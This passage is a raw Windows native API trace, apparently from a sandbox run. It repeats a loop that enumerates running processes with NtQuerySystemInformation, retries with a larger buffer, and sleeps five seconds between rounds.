ResultLength=0x0) returned 0xc0000004 [0221.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.401] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.499] NtAllocateVirtualMemory (in: 